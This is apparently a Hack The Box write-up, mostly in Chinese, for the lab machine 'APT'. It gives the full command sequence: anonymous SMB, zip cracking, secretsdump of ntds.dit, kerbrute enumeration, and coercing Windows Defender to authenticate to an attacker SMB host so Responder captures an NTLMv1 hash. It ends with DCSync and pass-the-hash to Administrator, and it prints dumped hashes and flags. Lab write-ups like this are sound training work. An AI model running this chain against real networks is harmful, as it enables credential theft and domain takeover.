introduce OS: Windows
first use nmap as usaul
1 2 3 4 5 ┌──(root💀kali)-[~/hackthebox/machine/apt] └─ PORT STATE SERVICE VERSION 80/tcp open tcpwrapped 135/tcp open tcpwrapped
ipv6扫描,首先用脚本获得ipv6地址:
1 2 3 4 5 6 7 ┌──(root💀kali)-[~/hackthebox/machine/apt] └─ [*] Retrieving network interface of 10.10.10.213 Address: apt Address: 10.10.10.213 Address: dead:beef::b885:d62a:d679:573f Address: dead:beef::3d18:f278:e3b:8a82
加hosts:
1 dead:beef::b885:d62a:d679:573f apt.htb
ipv6 scan Ipv6看到很多端口可能开放,例如445:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 ┌──(root💀kali)-[~/hackthebox/machine/apt] └─ ... PORT STATE SERVICE REASON VERSION 53/udp open|filtered domain no-response 67/udp open|filtered dhcps no-response 68/udp open|filtered dhcpc no-response 69/udp open|filtered tftp no-response 123/udp open|filtered ntp no-response 135/udp open|filtered msrpc no-response 137/udp open|filtered netbios-ns no-response 138/udp open|filtered netbios-dgm no-response 139/udp open|filtered netbios-ssn no-response 161/udp open|filtered snmp no-response 162/udp open|filtered snmptrap no-response 445/udp open|filtered microsoft-ds no-response 500/udp open|filtered isakmp no-response 514/udp open|filtered syslog no-response 520/udp open|filtered route no-response 631/udp open|filtered ipp no-response 1434/udp open|filtered ms-sql-m no-response 1900/udp open|filtered upnp no-response 4500/udp open|filtered nat-t-ike no-response 49152/udp open|filtered unknown no-response ...
SMB 这里需要vpn和smbclient同一台机器才能访问到ipv6地址,mac连vpn,kali虚拟机能访问到靶机ipv4,访问不了ipv6:
smb匿名访问,可以看到有个backup目录:
1 2 3 4 5 6 7 8 9 10 11 12 ┌──(root💀kali)-[~/hackthebox/machine/apt] └─ Enter WORKGROUP\root's password: Anonymous login successful Sharename Type Comment --------- ---- ------- backup Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share apt.htb is an IPv6 address -- no workgroup available
backup 1 2 3 4 5 6 7 8 9 10 11 12 ┌──(root💀kali)-[~/hackthebox/machine/apt] └─ Enter WORKGROUP\root's password: Anonymous login successful Try "help" to get a list of possible commands. smb: \> dir . D 0 Thu Sep 24 03:30:52 2020 .. D 0 Thu Sep 24 03:30:52 2020 backup.zip A 10650961 Thu Sep 24 03:30:32 2020 10357247 blocks of size 4096. 7270207 blocks available smb: \> get backup.zip
里面是一个zip文件,下载下来:
解压需要密码
zip crack 首先破解压缩包密码:
1 2 3 fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup.zip PASSWORD FOUND!!!!: pw == iloveyousomuch
secrets 看到里面有SYSTEM和ntds.dit,那就是通过这两个文件提取hash:
1 2 3 cp Active\ Directory/ntds.dit .cp registry/SYSTEM .impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL > user_pass_and_hash.txt
手动把txt开头结尾的输出删掉,只留hash信息
users.txt 提取出用户名:
1 cat users_and_hashes.txt | awk -F '\\:' '{print $1}' | uniq -u | sort > users.txt
kerbrute 用kerbrute筛选出有效的用户名:
这里先改下hosts, 域控和域也加进去:
1 dead:beef::b885:d62a:d679:573f apt.htb apt.htb.local htb.local
之后kerbrute做用户枚举:
1 ./kerbrute --dc apt.htb.local -d htb.local users.txt
有三个有效用户名,需要关注henry.vinson(爆破挺费时间的,等吧):
henry.vinson hash也只需要这个用户的就可以,但这个hash并不能直接用于登录:
1 2 3 4 5 6 cat users_and_hashes.txt | grep henry.vinsonhenry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f::: henry.vinson:aes256-cts-hmac-sha1-96:4c0ec4cffc953266ed72d9b565da62115655d2f402416af92e4e76d121663e2f henry.vinson:aes128-cts-hmac-sha1-96:da63c28166768a2829f00d30ec9fbddd henry.vinson:des-cbc-md5:80a2c83213b3dfd6
hashes 之前得到的那些也可以处理一下,只留hash:
1 cat users_and_hashes.txt | grep -v aes | grep -v des | awk -F '\\:' '{print $3":"$4}' > hashes.txt
getTGT 如果尝试crackmapexec用有效用户名和hash组合爆破的话会被锁定,可以使用getTGT, 得到有效hash及tgt(hash不能通过evil-winrm登录):
1 2 3 4 5 6 7 ┌──(root💀kali)-[~/hackthebox/machine/apt] └─ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Saving ticket in henry.vinson@apt.htb.ccache export KRB5CCNAME=henry.vinson@apt.htb.ccache
regdump 因为有ticket。可以去dump注册表(这一步也费时间,等吧):
1 impacket-reg -k apt.htb.local query -keyName HKU -s >> regdump.txt
henry password 搜索发现Username,去查看对应位置得到password:
1 2 3 4 cat regdump.txt | grep -n henryUserName REG_SZ henry.vinson_adm PassWord REG_SZ G1
user flag 然后直接evil-winrm连上去,得到user.txt:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 ┌──(root💀kali)-[~/hackthebox/machine/apt] └─ Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> whoami htb\henry.vinson_adm *Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> cd .. *Evil-WinRM* PS C:\Users\henry.vinson_adm> ls Directory: C:\Users\henry.vinson_adm Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 9/24/2020 9:17 AM Contacts d-r--- 10/23/2020 11:02 AM Desktop d-r--- 10/23/2020 10:39 AM Documents d-r--- 9/24/2020 9:17 AM Downloads d-r--- 9/24/2020 9:17 AM Favorites d-r--- 9/24/2020 9:17 AM Links d-r--- 9/24/2020 9:17 AM Music d-r--- 9/24/2020 9:17 AM Pictures d-r--- 9/24/2020 9:17 AM Saved Games d-r--- 9/24/2020 9:17 AM Searches d-r--- 9/24/2020 9:17 AM Videos *Evil-WinRM* PS C:\Users\henry.vinson_adm> cd Desktop *Evil-WinRM* PS C:\Users\henry.vinson_adm\Desktop> cat user.txt da54b84a64d4bf09badf5c4f1dc839c4
信息搜集 powershell历史中相关信息,显示更改过LAN Manager的安全级别,根据文档,2意味着客户端设备使用NTLMv1身份验证,如果服务器支持,则它们使用NTLMv2会话安全性。域控制器接受LM,NTLM和NTLMv2身份验证:
1 2 3 4 *Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> type C:\Users\henry.vinson_adm\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt $Cred = get-credential administratorinvoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}
Network security: LAN Manager authentication level
可以考虑使用Responder捕获LM hash, 让目标尝试连接回我们即可
Responder 这里利用了服务器上的Defender,让它扫描我们的smb,从而得到LM hash:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 nano /etc/responder/Responder.conf Challenge = 1122334455667788 sudo responder --lm -I tun0 cd "\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0" .\MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.3\file.exe [+] Listening for events... [SMB] NTLMv1 Client : 10.10.10.213 [SMB] NTLMv1 Username : HTB\APT$ [SMB] NTLMv1 Hash : APT$::HTB:F9998A19AC07AC9080BFB4D376E2DF7A42EFA694AA779027:F9998A19AC07AC9080BFB4D376E2DF7A42EFA694AA779027:17a961c8b50fdbd7 [*] Skipping previously captured hash for HTB\APT$ [*] Skipping previously captured hash for HTB\APT$
hash crack 需要手动设置challenge后的hash,前面随机challenge的话就改配置再跑一遍:
1 APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
直接在线提交破解:
1 2 NTHASH:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384 Key: d167c3238864b12f5f82feae86a7f798
secretsdump 然后就是使用得到的key组合出新hash(前半部分意味着无密码),使用这个hash去dump secrets:
1 aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ┌──(root💀kali)-[~/hackthebox/machine/apt] └─ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb::: henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef::: APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3 Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413 Administrator:des-cbc-md5:0816d9d052239b8a krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b krbtgt:des-cbc-md5:f8c26238c2d976bf henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2 henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af henry.vinson:des-cbc-md5:73b6f71cae264fad henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4 henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b henry.vinson_adm:des-cbc-md5:5df8682c8c07a179 APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454 APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9 APT$:des-cbc-md5:76c45245f104a4bf [*] Cleaning up...
get root 直接使用Administrator hash连接,得到root.txt:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ┌──(root💀kali)-[~/hackthebox/machine/apt] └─ Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami htb\administrator *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> ls Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 2/7/2021 2:57 PM 34 root.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt e950f2ec0ba974b0e264f13c08473602
Summary of knowledge
IOXIDResolver获得ipv6地址
smb匿名访问
zip压缩包破解
impacket-secretsdump提取hash
kerbrute用户枚举
getTGT, 得到有效hash及tgt
impacket-reg dump注册表
Responder利用服务器上的Defender扫描本机smb捕获LM hash
crack.sh crack hash
impacket-secretsdump dump administrator’s LM hash
QQ: 1185151867
twitter: https://twitter.com/fdlucifer11
github: https://github.com/FDlucifer
I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…
